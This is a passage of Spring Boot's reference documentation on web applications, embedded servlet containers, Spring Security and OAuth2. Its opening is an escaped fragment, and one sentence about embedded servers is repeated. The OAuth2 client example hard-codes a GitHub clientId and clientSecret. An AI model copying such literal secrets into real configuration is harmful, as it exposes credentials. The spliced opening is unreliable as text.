name=\"!production\">\n\t\t<!-- configuration to be enabled when the \"production\" profile is not active -->\n\t<\/springProfile>\n----\n\n\n\n==== Environment properties\nThe `<springProperty>` tag allows you to surface properties from the Spring `Environment`\nfor use within Logback. This can be useful if you want to access values from your\n`application.properties` file in your logback configuration. The tag works in a similar\nway to Logback's standard `<property>` tag, but rather than specifying a direct `value`\nyou specify the `source` of the property (from the `Environment`). You can use the `scope`\nattribute if you need to store the property somewhere other than in `local` scope.\n\n[source,xml,indent=0]\n----\n\t<springProperty scope=\"context\" name=\"fluentHost\" source=\"myapp.fluentd.host\"\/>\n\t<appender name=\"FLUENT\" class=\"ch.qos.logback.more.appenders.DataFluentAppender\">\n\t\t<remoteHost>${fluentHost}<\/remoteHost>\n\t\t...\n\t<\/appender>\n----\n\nTIP: The `RelaxedPropertyResolver` is used to access `Environment` properties. If you specify\nthe `source` in dashed notation (`my-property-name`) all the relaxed variations will be\ntried (`myPropertyName`, `MY_PROPERTY_NAME` etc.).\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat, Jetty, or Undertow. Most web\napplications will use the `spring-boot-starter-web` module to get up and running quickly.
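\n\nFor example, with Maven the module is a single additional dependency (the version is typically inherited from the Spring Boot parent):\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----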
You can easily create a
self-contained HTTP server using embedded Tomcat, Jetty, or Undertow. Most web
applications will use the `spring-boot-starter-web` module to get up and running quickly.

If you haven't yet developed a Spring Boot web application you can follow the
"Hello World!" example in the
_<<getting-started.adoc#getting-started-first-application, Getting started>>_ section.



[[boot-features-spring-mvc]]
=== The '`Spring Web MVC framework`'
The Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich
'`model view controller`' web framework. Spring MVC lets you create special `@Controller`
or `@RestController` beans to handle incoming HTTP requests. Methods in your controller
are mapped to HTTP using `@RequestMapping` annotations.

Here is a typical example `@RestController` to serve JSON data:

[source,java,indent=0]
----
	@RestController
	@RequestMapping(value="/users")
	public class MyRestController {

		@RequestMapping(value="/{user}", method=RequestMethod.GET)
		public User getUser(@PathVariable Long user) {
			// ...
		}

		@RequestMapping(value="/{user}/customers", method=RequestMethod.GET)
		public List<Customer> getUserCustomers(@PathVariable Long user) {
			// ...
		}

		@RequestMapping(value="/{user}", method=RequestMethod.DELETE)
		public User deleteUser(@PathVariable Long user) {
			// ...
		}

	}
----

Spring MVC is part of the core Spring Framework and detailed information is available in
the {spring-reference}#mvc[reference documentation]. There are also several guides
available at http://spring.io/guides that cover Spring MVC.



[[boot-features-spring-mvc-auto-configuration]]
==== Spring MVC auto-configuration
Spring Boot provides auto-configuration for Spring MVC that works well with most
applications.

The auto-configuration adds the following features on top of Spring's defaults:

* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.
* Support for serving static resources, including support for WebJars (see below).
* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.
* Support for `HttpMessageConverters` (see below).
* Automatic registration of `MessageCodesResolver` (see below).
* Static `index.html` support.
* Custom `Favicon` support.
* Automatic use of a `ConfigurableWebBindingInitializer` bean (see below).

If you want to take complete control of Spring MVC, you can add your own `@Configuration`
annotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and
you just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,
formatters, view controllers etc.) you can add your own `@Bean` of type
`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.
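
For example, a minimal sketch along those lines (the `"/"` mapping and the `"home"` view
name are purely illustrative):

[source,java,indent=0]
----
	import org.springframework.context.annotation.Configuration;
	import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
	import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;

	@Configuration
	public class MvcConfiguration extends WebMvcConfigurerAdapter {

		@Override
		public void addViewControllers(ViewControllerRegistry registry) {
			// map "/" straight to a view, keeping all other Boot MVC defaults
			registry.addViewController("/").setViewName("home");
		}

	}
----
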

[[boot-features-spring-mvc-message-converters]]
==== HttpMessageConverters
Spring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and
responses. Sensible defaults are included out of the box, for example Objects can be
automatically converted to JSON (using the Jackson library) or XML (using the Jackson
XML extension if available, else using JAXB). Strings are encoded using `UTF-8` by
default.

If you need to add or customize converters you can use Spring Boot's
`HttpMessageConverters` class:

[source,java,indent=0]
----
	import org.springframework.boot.autoconfigure.web.HttpMessageConverters;
	import org.springframework.context.annotation.*;
	import org.springframework.http.converter.*;

	@Configuration
	public class MyConfiguration {

		@Bean
		public HttpMessageConverters customConverters() {
			HttpMessageConverter<?> additional = ...
			HttpMessageConverter<?> another = ...
			return new HttpMessageConverters(additional, another);
		}

	}
----

Any `HttpMessageConverter` bean that is present in the context will be added to the list of
converters. You can also override default converters that way.



[[boot-features-spring-message-codes]]
==== MessageCodesResolver
Spring MVC has a strategy for generating error codes for rendering error messages
from binding errors: `MessageCodesResolver`. Spring Boot will create one for you if
you set the `spring.mvc.message-codes-resolver.format` property to `PREFIX_ERROR_CODE` or
`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).



[[boot-features-spring-mvc-static-content]]
==== Static Content
By default Spring Boot will serve static content from a directory called `/static` (or
`/public` or `/resources` or `/META-INF/resources`) in the classpath or from the root
of the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you
can modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the
`addResourceHandlers` method.

In a stand-alone web application the default servlet from the container is also
enabled, and acts as a fallback, serving content from the root of the `ServletContext` if
Spring decides not to handle it. Most of the time this will not happen (unless you modify
the default MVC configuration) because Spring will always be able to handle requests
through the `DispatcherServlet`.

You can customize the static resource locations using `spring.resources.staticLocations`
(replacing the default values with a list of directory locations). If you do this the
default welcome page detection will switch to your custom locations, so if there is an
`index.html` in any of your locations on startup, it will be the home page of the
application.

In addition to the '`standard`' static resource locations above, a special case is made
for http://www.webjars.org/[Webjars content]. Any resources with a path in `+/webjars/**+`
will be served from jar files if they are packaged in the Webjars format.

TIP: Do not use the `src/main/webapp` directory if your application will be packaged as a
jar. Although this directory is a common standard, it will *only* work with war packaging
and it will be silently ignored by most build tools if you generate a jar.
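
As noted above, you can also override `addResourceHandlers` to serve additional
locations. A minimal sketch (the `/files/**` pattern and the `file:/opt/files/` directory
are hypothetical):

[source,java,indent=0]
----
	@Configuration
	public class StaticResourceConfiguration extends WebMvcConfigurerAdapter {

		@Override
		public void addResourceHandlers(ResourceHandlerRegistry registry) {
			// expose an external directory in addition to the default locations
			registry.addResourceHandler("/files/**")
					.addResourceLocations("file:/opt/files/");
		}

	}
----
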
Spring Boot also supports advanced resource handling features provided by Spring MVC,
allowing use cases such as cache busting static resources or using version-agnostic URLs
for Webjars.

For example, the following configuration will configure a cache busting solution
for all static resources, effectively adding a content hash in URLs, such as
`<link href="/css/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css"/>`:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.resources.chain.strategy.content.enabled=true
	spring.resources.chain.strategy.content.paths=/**
----

NOTE: Links to resources are rewritten in templates at runtime, thanks to a
`ResourceUrlEncodingFilter`, auto-configured for Thymeleaf and Velocity. You should
manually declare this filter when using JSPs. Other template engines aren't automatically
supported right now, but can be with custom template macros/helpers and the use of the
{spring-javadoc}/web/servlet/resource/ResourceUrlProvider.{dc-ext}[`ResourceUrlProvider`].

When loading resources dynamically with, for example, a JavaScript module loader, renaming
files is not an option. That's why other strategies are also supported and can be combined.
A "fixed" strategy will add a static version string in the URL, without changing the file
name:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.resources.chain.strategy.content.enabled=true
	spring.resources.chain.strategy.content.paths=/**
	spring.resources.chain.strategy.fixed.enabled=true
	spring.resources.chain.strategy.fixed.paths=/js/lib/
	spring.resources.chain.strategy.fixed.version=v12
----

With this configuration, JavaScript modules located under `"/js/lib/"` will use a fixed
versioning strategy `"/v12/js/lib/mymodule.js"` while other resources will still use
the content one `<link href="/css/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css"/>`.

See {sc-spring-boot-autoconfigure}/web/ResourceProperties.{sc-ext}[`ResourceProperties`]
for more of the supported options.

[TIP]
====
This feature has been thoroughly described in a dedicated
https://spring.io/blog/2014/07/24/spring-framework-4-1-handling-static-web-resources[blog post]
and in Spring Framework's {spring-reference}/#mvc-config-static-resources[reference documentation].
====



[[boot-features-spring-mvc-web-binding-initializer]]
==== ConfigurableWebBindingInitializer
Spring MVC uses a `WebBindingInitializer` to initialize a `WebDataBinder` for a particular
request. If you create your own `ConfigurableWebBindingInitializer` `@Bean`, Spring Boot
will automatically configure Spring MVC to use it.



[[boot-features-spring-mvc-template-engines]]
==== Template engines
As well as REST web services, you can also use Spring MVC to serve dynamic HTML content.
Spring MVC supports a variety of templating technologies including Velocity, FreeMarker
and JSPs.
Many other templating engines also ship their own Spring MVC integrations.

Spring Boot includes auto-configuration support for the following templating engines:

 * http://freemarker.org/docs/[FreeMarker]
 * http://docs.groovy-lang.org/docs/next/html/documentation/template-engines.html#_the_markuptemplateengine[Groovy]
 * http://www.thymeleaf.org[Thymeleaf]
 * http://velocity.apache.org[Velocity]
 * http://mustache.github.io/[Mustache]

TIP: JSPs should be avoided if possible; there are several
<<boot-features-jsp-limitations, known limitations>> when using them with embedded
servlet containers.

When you're using one of these templating engines with the default configuration, your
templates will be picked up automatically from `src/main/resources/templates`.

TIP: IntelliJ IDEA orders the classpath differently depending on how you run your
application. Running your application in the IDE via its main method will result in a
different ordering to when you run your application using Maven or Gradle or from its
packaged jar. This can cause Spring Boot to fail to find the templates on the classpath.
If you're affected by this problem you can reorder the classpath in the IDE to place the
module's classes and resources first. Alternatively, you can configure the template prefix
to search every templates directory on the classpath: `classpath*:/templates/`.



[[boot-features-error-handling]]
==== Error Handling
Spring Boot provides an `/error` mapping by default that handles all errors in a sensible
way, and it is registered as a '`global`' error page in the servlet container. For machine
clients it will produce a JSON response with details of the error, the HTTP status and the
exception message. For browser clients there is a '`whitelabel`' error view that renders
the same data in HTML format (to customize it just add a `View` that resolves to
'`error`'). To replace the default behaviour completely you can implement
`ErrorController` and register a bean definition of that type, or simply add a bean of
type `ErrorAttributes` to use the existing mechanism but replace the contents.

TIP: The `BasicErrorController` can be used as a base class for a custom `ErrorController`.
This is particularly useful if you want to add a handler for a new content type (the default
is to handle `text/html` specifically and provide a fallback for everything else). To do that
just extend `BasicErrorController` and add a public method with a `@RequestMapping` that
has a `produces` attribute, and create a bean of your new type.

If you want more specific error pages for some conditions, the embedded servlet containers
support a uniform Java DSL for customizing the error handling. Assuming that you have a
mapping for `/400`:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public EmbeddedServletContainerCustomizer containerCustomizer() {
		return new MyCustomizer();
	}

	// ...

	private static class MyCustomizer implements EmbeddedServletContainerCustomizer {

		@Override
		public void customize(ConfigurableEmbeddedServletContainer container) {
			container.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, "/400"));
		}

	}
----

You can also use regular Spring MVC features like
{spring-reference}/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and
{spring-reference}/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`
will then pick up any unhandled exceptions.
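
For instance, a minimal sketch (the exception type and status code are illustrative) of a
`@ControllerAdvice` that renders one exception type itself, leaving everything else to
the error mapping:

[source,java,indent=0]
----
	@ControllerAdvice
	public class MyExceptionHandler {

		@ExceptionHandler(IllegalStateException.class)
		public ResponseEntity<String> handleIllegalState(IllegalStateException ex) {
			// render this particular exception as a plain 409 response
			return ResponseEntity.status(HttpStatus.CONFLICT).body(ex.getMessage());
		}

	}
----
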
N.B. If you register an `ErrorPage` with a path that will end up being handled by a
`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),
then the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public FilterRegistrationBean myFilter() {
		FilterRegistrationBean registration = new FilterRegistrationBean();
		registration.setFilter(new MyFilter());
		...
		registration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));
		return registration;
	}
----

(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).



[[boot-features-error-handling-websphere]]
===== Error Handling on WebSphere Application Server
When deployed to a servlet container, Spring Boot uses its error page filter to forward
a request with an error status to the appropriate error page. The request can only be
forwarded to the correct error page if the response has not already been committed. By
default, WebSphere Application Server 8.0 and later commits the response upon successful
completion of a servlet's service method. You should disable this behaviour by setting
`com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`.



[[boot-features-spring-hateoas]]
==== Spring HATEOAS
If you're developing a RESTful API that makes use of hypermedia, Spring Boot provides
auto-configuration for Spring HATEOAS that works well with most applications. The
auto-configuration replaces the need to use `@EnableHypermediaSupport` and registers a
number of beans to ease building hypermedia-based applications including a
`LinkDiscoverers` (for client side support) and an `ObjectMapper` configured to correctly
marshal responses into the desired representation. The `ObjectMapper` will be customized
based on the `spring.jackson.*` properties or a `Jackson2ObjectMapperBuilder` bean if one
exists.

You can take control of Spring HATEOAS's configuration by using
`@EnableHypermediaSupport`.
Note that this will disable the `ObjectMapper` customization
described above.



[[boot-features-cors]]
==== CORS support

http://en.wikipedia.org/wiki/Cross-origin_resource_sharing[Cross-origin resource sharing]
(CORS) is a http://www.w3.org/TR/cors/[W3C specification] implemented by
http://caniuse.com/#feat=cors[most browsers] that allows you to specify in a flexible
way what kind of cross domain requests are authorized, instead of using some less secure
and less powerful approaches like IFRAME or JSONP.

As of version 4.2, Spring MVC {spring-reference}/#cors[supports CORS] out of the box.
Using {spring-reference}/#_controller_method_cors_configuration[controller method CORS
configuration] with
{spring-javadoc}/org/springframework/web/bind/annotation/CrossOrigin.html[`@CrossOrigin`]
annotations in your Spring Boot application does not require any specific configuration.
{spring-reference}/#_global_cors_configuration[Global CORS configuration] can be defined
by registering a `WebMvcConfigurer` bean with a customized `addCorsMappings(CorsRegistry)`
method:

[source,java,indent=0]
----
	@Configuration
	public class MyConfiguration {

		@Bean
		public WebMvcConfigurer corsConfigurer() {
			return new WebMvcConfigurerAdapter() {
				@Override
				public void addCorsMappings(CorsRegistry registry) {
					registry.addMapping("/api/**");
				}
			};
		}
	}
----



[[boot-features-jersey]]
=== JAX-RS and Jersey
If you prefer the JAX-RS programming model for REST endpoints you can use one of the
available implementations instead of Spring MVC. Jersey 1.x and Apache CXF work quite
well out of the box if you just register their `Servlet` or `Filter` as a `@Bean` in your
application context. Jersey 2.x has some native Spring support so we also provide
auto-configuration support for it in Spring Boot together with a starter.

To get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a
dependency and then you need one `@Bean` of type `ResourceConfig` in which you register
all the endpoints:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Component
	public class JerseyConfig extends ResourceConfig {

		public JerseyConfig() {
			register(Endpoint.class);
		}

	}
----

All the registered endpoints should be `@Components` with HTTP resource annotations
(`@GET` etc.), e.g.

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Component
	@Path("/hello")
	public class Endpoint {

		@GET
		public String message() {
			return "Hello";
		}

	}
----

Since the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you
can `@Autowire` dependencies and inject external configuration with `@Value`. The Jersey
servlet will be registered and mapped to `/*` by default. You can change the mapping
by adding `@ApplicationPath` to your `ResourceConfig`.

By default Jersey will be set up as a Servlet in a `@Bean` of type
`ServletRegistrationBean` named `jerseyServletRegistration`. You can disable or override
that bean by creating one of your own with the same name. You can also use a Filter
instead of a Servlet by setting `spring.jersey.type=filter` (in which case the `@Bean` to
replace or override is `jerseyFilterRegistration`). The filter has an `@Order` which you
can set with `spring.jersey.filter.order`. Both the Servlet and the Filter registrations
can be given init parameters using `spring.jersey.init.*` to specify a map of properties.
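
For example, a minimal `application.properties` sketch (the Jersey tracing init parameter
is shown purely as an illustration):

[source,properties,indent=0]
----
	spring.jersey.type=filter
	spring.jersey.filter.order=10
	spring.jersey.init.jersey.config.server.tracing.type=ON_DEMAND
----
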
There is a {github-code}/spring-boot-samples/spring-boot-sample-jersey[Jersey sample] so
you can see how to set things up. There is also a
{github-code}/spring-boot-samples/spring-boot-sample-jersey1[Jersey 1.x sample]. Note that
in the Jersey 1.x sample the spring-boot Maven plugin has been configured to unpack
some Jersey jars so they can be scanned by the JAX-RS implementation (because the sample
asks for them to be scanned in its `Filter` registration). You may need to do the same if
any of your JAX-RS resources are packaged as nested jars.



[[boot-features-embedded-container]]
=== Embedded servlet container support
Spring Boot includes support for embedded Tomcat, Jetty, and Undertow servers. Most
developers will simply use the appropriate '`Starter POM`' to obtain a fully configured
instance. By default the embedded server will listen for HTTP requests on port `8080`.



[[boot-features-embedded-container-servlets-filters-listeners]]
==== Servlets, Filters, and listeners
When using an embedded servlet container you can register Servlets, Filters and all the
listeners from the Servlet spec (e.g. `HttpSessionListener`) either by using Spring beans
or by scanning for Servlet components.


[[boot-features-embedded-container-servlets-filters-listeners-beans]]
===== Registering Servlets, Filters, and listeners as Spring beans
Any `Servlet`, `Filter` or Servlet `*Listener` instance that is a Spring bean will be
registered with the embedded container. This can be particularly convenient if you want to
refer to a value from your `application.properties` during configuration.

By default, if the context contains only a single Servlet it will be mapped to `/`. In the
case of multiple Servlet beans the bean name will be used as a path prefix. Filters will
map to `+/*+`.

If convention-based mapping is not flexible enough you can use the
`ServletRegistrationBean`, `FilterRegistrationBean` and `ServletListenerRegistrationBean`
classes for complete control. You can also register items directly if your bean implements
the `ServletContextInitializer` interface.



[[boot-features-embedded-container-servlets-filters-listeners-scanning]]
===== Scanning for Servlets, Filters, and listeners
When using an embedded container, automatic registration of `@WebServlet`, `@WebFilter`,
and `@WebListener` annotated classes can be enabled using `@ServletComponentScan`.

TIP: `@ServletComponentScan` will have no effect in a standalone container, where the
container's built-in discovery mechanisms will be used instead.



[[boot-features-embedded-container-application-context]]
==== The EmbeddedWebApplicationContext
Under the hood Spring Boot uses a new type of `ApplicationContext` for embedded servlet
container support. The `EmbeddedWebApplicationContext` is a special type of
`WebApplicationContext` that bootstraps itself by searching for a single
`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`,
`JettyEmbeddedServletContainerFactory`, or `UndertowEmbeddedServletContainerFactory` will
have been auto-configured.

NOTE: You usually won't need to be aware of these implementation classes.
Most
applications will be auto-configured and the appropriate `ApplicationContext` and
`EmbeddedServletContainerFactory` will be created on your behalf.



[[boot-features-customizing-embedded-containers]]
==== Customizing embedded servlet containers
Common servlet container settings can be configured using Spring `Environment`
properties. Usually you would define the properties in your `application.properties`
file.

Common server settings include:

* `server.port` -- The listen port for incoming HTTP requests.
* `server.address` -- The interface address to bind to.
* `server.session.timeout` -- A session timeout.

See the {sc-spring-boot-autoconfigure}/web/ServerProperties.{sc-ext}[`ServerProperties`]
class for a complete list.



[[boot-features-programmatic-embedded-container-customization]]
===== Programmatic customization
If you need to configure your embedded servlet container programmatically you can
register a Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.
`EmbeddedServletContainerCustomizer` provides access to the
`ConfigurableEmbeddedServletContainer` which includes numerous customization setter
methods.

[source,java,indent=0]
----
	import org.springframework.boot.context.embedded.*;
	import org.springframework.stereotype.Component;

	@Component
	public class CustomizationBean implements EmbeddedServletContainerCustomizer {

		@Override
		public void customize(ConfigurableEmbeddedServletContainer container) {
			container.setPort(9000);
		}

	}
----



[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]
===== Customizing ConfigurableEmbeddedServletContainer directly
If the above customization techniques are too limited, you can register the
`TomcatEmbeddedServletContainerFactory`, `JettyEmbeddedServletContainerFactory` or
`UndertowEmbeddedServletContainerFactory` bean yourself.

[source,java,indent=0]
----
	@Bean
	public EmbeddedServletContainerFactory servletContainer() {
		TomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();
		factory.setPort(9000);
		factory.setSessionTimeout(10, TimeUnit.MINUTES);
		factory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, "/notfound.html"));
		return factory;
	}
----

Setters are provided for many configuration options. Several protected method
'`hooks`' are also provided should you need to do something more exotic. See the
source code documentation for details.



[[boot-features-jsp-limitations]]
==== JSP limitations
When running a Spring Boot application that uses an embedded servlet container (and is
packaged as an executable archive), there are some limitations in the JSP support.

* With Tomcat it should work if you use war packaging, i.e. an executable war will work,
  and will also be deployable to a standard container (not limited to, but including
  Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.

* Jetty does not currently work as an embedded container with JSPs.

* Undertow does not support JSPs.

There is a {github-code}/spring-boot-samples/spring-boot-sample-web-jsp[JSP sample] so you
can see how to set things up.



[[boot-features-security]]
== Security
If Spring Security is on the classpath then web applications will be secure by default
with '`basic`' authentication on all HTTP endpoints. To add method-level security to a web
application you can also add `@EnableGlobalMethodSecurity` with your desired settings.
Additional information can be found in the {spring-security-reference}#jc-method[Spring
Security Reference].
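
For example, a minimal sketch (the service and role name are illustrative) that enables
`@PreAuthorize` checks:

[source,java,indent=0]
----
	@Configuration
	@EnableGlobalMethodSecurity(prePostEnabled = true)
	public class MethodSecurityConfiguration {

	}

	@Service
	public class AccountService {

		@PreAuthorize("hasRole('ADMIN')")
		public void closeAccount(Long accountId) {
			// only callers with the ADMIN role reach this point
		}

	}
----
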
The default `AuthenticationManager` has a single user ('`user`' username and random
password, printed at INFO level when the application starts up):

[indent=0]
----
	Using default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35
----

NOTE: If you fine-tune your logging configuration, ensure that the
`org.springframework.boot.autoconfigure.security` category is set to log `INFO` messages,
otherwise the default password will not be printed.

You can change the password by providing a `security.user.password`. This and other useful
properties are externalized via
{sc-spring-boot-autoconfigure}/security/SecurityProperties.{sc-ext}[`SecurityProperties`]
(properties prefix "security").

The default security configuration is implemented in `SecurityAutoConfiguration` and in
the classes imported from there (`SpringBootWebSecurityConfiguration` for web security
and `AuthenticationManagerConfiguration` for authentication configuration which is also
relevant in non-web applications). To switch off the Boot default configuration
completely in a web application you can add a bean with `@EnableWebSecurity`. To customize
it you normally use external properties and beans of type `WebSecurityConfigurerAdapter`
(e.g. to add form-based login). There are several secure applications in the
{github-code}/spring-boot-samples/[Spring Boot samples] to get you started with common
use cases.

The basic features you get out of the box in a web application are:

* An `AuthenticationManager` bean with in-memory store and a single user (see
  `SecurityProperties.User` for the properties of the user).
* Ignored (unsecure) paths for common static resource locations (`+/css/**+`, `+/js/**+`,
  `+/images/**+` and `+**/favicon.ico+`).
* HTTP Basic security for all other endpoints.
* Security events published to Spring's `ApplicationEventPublisher` (successful and
  unsuccessful authentication and access denied).
* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are
  on by default.

All of the above can be switched on and off or modified using external properties
(`+security.*+`). To override the access rules without changing any other auto-configured
features add a `@Bean` of type `WebSecurityConfigurerAdapter` with
`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.



[[boot-features-security-oauth2]]
=== OAuth2
If you have `spring-security-oauth2` on your classpath you can take advantage of some
auto-configuration to make it easy to set up an Authorization or Resource Server.



[[boot-features-security-oauth2-authorization-server]]
==== Authorization Server
To create an Authorization Server and grant access tokens you need to use
`@EnableAuthorizationServer` and provide `security.oauth2.client.client-id` and
`security.oauth2.client.client-secret` properties. The client will be registered for you
in an in-memory repository.

Having done that you will be able to use the client credentials to create an access token,
for example:

[indent=0]
----
	$ curl client:secret@localhost:8080/oauth/token -d grant_type=password -d username=user -d password=pwd
----

The basic auth credentials for the `/token` endpoint are the `client-id` and
`client-secret`.
The user credentials are the normal Spring Security user details (which
default in Spring Boot to "`user`" and a random password).

To switch off the auto-configuration and configure the Authorization Server features
yourself just add a `@Bean` of type `AuthorizationServerConfigurer`.



[[boot-features-security-oauth2-resource-server]]
==== Resource Server
To use the access token you need a Resource Server (which can be the same as the
Authorization Server). Creating a Resource Server is easy: just add
`@EnableResourceServer` and provide some configuration to allow the server to decode
access tokens. If your application is also an Authorization Server it already knows how
to decode tokens, so there is nothing else to do. If your app is a standalone service then
you need to give it some more configuration, using one of the following options:

* `security.oauth2.resource.user-info-uri` to use the `/me` resource (e.g.
`https://uaa.run.pivotal.io/userinfo` on PWS)

* `security.oauth2.resource.token-info-uri` to use the token decoding endpoint (e.g.
`https://uaa.run.pivotal.io/check_token` on PWS).

If you specify both the `user-info-uri` and the `token-info-uri` then you can set a flag
to say that one is preferred over the other (`prefer-token-info=true` is the default).

Alternatively (instead of `user-info-uri` or `token-info-uri`) if the tokens are JWTs you
can configure a `security.oauth2.resource.jwt.key-value` to decode them locally (where the
key is a verification key). The verification key value is either a symmetric secret or
PEM-encoded RSA public key. If you don't have the key and it's public you can provide a
URI where it can be downloaded (as a JSON object with a "`value`" field) with
`security.oauth2.resource.jwt.key-uri`. E.g. on PWS:

[indent=0]
----
	$ curl https://uaa.run.pivotal.io/token_key
	{"alg":"SHA256withRSA","value":"-----BEGIN PUBLIC KEY-----\nMIIBI...\n-----END PUBLIC KEY-----\n"}
----

WARNING: If you use the `security.oauth2.resource.jwt.key-uri` the authorization server
needs to be running when your application starts up. It will log a warning if it can't
find the key, and tell you what to do to fix it.



[[boot-features-security-oauth2-token-type]]
=== Token Type in User Info
Google, and certain other 3rd party identity providers, are more strict about the token
type name that is sent in the headers to the user info endpoint. The default is "`Bearer`"
which suits most providers and matches the spec, but if you need to change it you can set
`security.oauth2.resource.token-type`.



[[boot-features-security-custom-user-info]]
=== Customizing the User Info RestTemplate
If you have a `user-info-uri`, the resource server features use an `OAuth2RestTemplate`
internally to fetch user details for authentication. This is provided as a qualified
`@Bean` with id `userInfoRestTemplate`, but you shouldn't need to know that to just
use it. The default should be fine for most providers, but occasionally you might need to
add additional interceptors, or change the request authenticator (which is how the token
gets attached to outgoing requests). To add a customization just create a bean of type
`UserInfoRestTemplateCustomizer` - it has a single method that will be called after the
bean is created but before it is initialized. The rest template that is being customized
here is _only_ used internally to carry out authentication.
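
For example, a minimal sketch (the extra header is purely illustrative, and this assumes
the customizer's single method receives the `OAuth2RestTemplate`) that adds an
interceptor:

[source,java,indent=0]
----
	@Bean
	public UserInfoRestTemplateCustomizer userInfoRestTemplateCustomizer() {
		return new UserInfoRestTemplateCustomizer() {
			@Override
			public void customize(OAuth2RestTemplate template) {
				// attach an extra header to every user info request
				template.getInterceptors().add(new ClientHttpRequestInterceptor() {
					@Override
					public ClientHttpResponse intercept(HttpRequest request, byte[] body,
							ClientHttpRequestExecution execution) throws IOException {
						request.getHeaders().add("X-Client", "my-app");
						return execution.execute(request, body);
					}
				});
			}
		};
	}
----
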
[TIP]
====
To set an RSA key value in YAML use the "`pipe`" continuation marker to split it over
multiple lines ("`|`") and remember to indent the key value (it's a standard YAML
language feature). Example:

[source,yaml,indent=0]
----
	security:
		oauth2:
			resource:
				jwt:
					keyValue: |
						-----BEGIN PUBLIC KEY-----
						MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC...
						-----END PUBLIC KEY-----
----
====



[[boot-features-security-custom-user-info-client]]
==== Client
To make your webapp into an OAuth2 client you can simply add `@EnableOAuth2Client` and
Spring Boot will create an `OAuth2RestTemplate` for you to `@Autowire`. It uses the
`security.oauth2.client.*` properties as credentials (the same as you might be using in
the Authorization Server), but in addition it will need to know the authorization and
token URIs in the Authorization Server. For example:

.application.yml
[source,yaml,indent=0]
----
	security:
		oauth2:
			client:
				clientId: bd1c0a783ccdd1c9b9e4
				clientSecret: 1a9030fbca47a5b2c28e92f19050bb77824b5ad1
				accessTokenUri: https://github.com/login/oauth/access_token
				userAuthorizationUri: https://github.com/login/oauth/authorize
				clientAuthenticationScheme: form
----

An application with this configuration will redirect to Github for authorization when you
attempt to use the `OAuth2RestTemplate`. If you are already signed into Github you won't
even notice that it has authenticated. These specific credentials will only work if your
application is running on port 8080 (register your own client app in Github or other
provider for more flexibility).

To limit the scope that the client asks for when it obtains an access token you can set
`security.oauth2.client.scope` (comma separated or an array in YAML). By default the scope
is empty and it is up to the Authorization Server to decide what the defaults should be,
usually depending on the settings in the client registration that it holds.

NOTE: There is also a setting for `security.oauth2.client.client-authentication-scheme`
which defaults to "`header`" (but you might need to set it to "`form`" if, like Github for
instance, your OAuth2 provider doesn't like header authentication). In fact, the
`security.oauth2.client.*` properties are bound to an instance of
`AuthorizationCodeResourceDetails` so all its properties can be specified.

TIP: In a non-web application you can still `@Autowire` an `OAuth2RestOperations` and it
is still wired into the `security.oauth2.client.*` configuration. In this case it is a
"`client credentials token grant`" you will be asking for if you use it (and there is no
need to use `@EnableOAuth2Client` or `@EnableOAuth2Sso`). To switch it off, just remove
the `security.oauth2.client.client-id` from your configuration (or make it the empty
string).



[[boot-features-security-oauth2-single-sign-on]]
==== Single Sign On
An OAuth2 Client can be used to fetch user details from the provider (if such features are
available) and then convert them into an `Authentication` token for Spring Security.
The Resource Server features above support this via the `user-info-uri` property. This is
the basis for a Single Sign On (SSO) protocol based on OAuth2, and Spring Boot makes it
easy to participate by providing an annotation `@EnableOAuth2Sso`.
The Github client above can
protect all its resources and authenticate using the Github `/user/` endpoint, by adding
that annotation and declaring where to find the endpoint (in addition to the
`security.oauth2.client.*` configuration already listed above):

.application.yml
[source,yaml,indent=0]
----
	security:
		oauth2:
			...
			resource:
				userInfoUri: https://api.github.com/user
				preferTokenInfo: false
----

Since all paths are secure by default, there is no "`home`" page that you can show to
unauthenticated users and invite them to login (by visiting the `/login` path, or the
path specified by `security.oauth2.sso.login-path`).

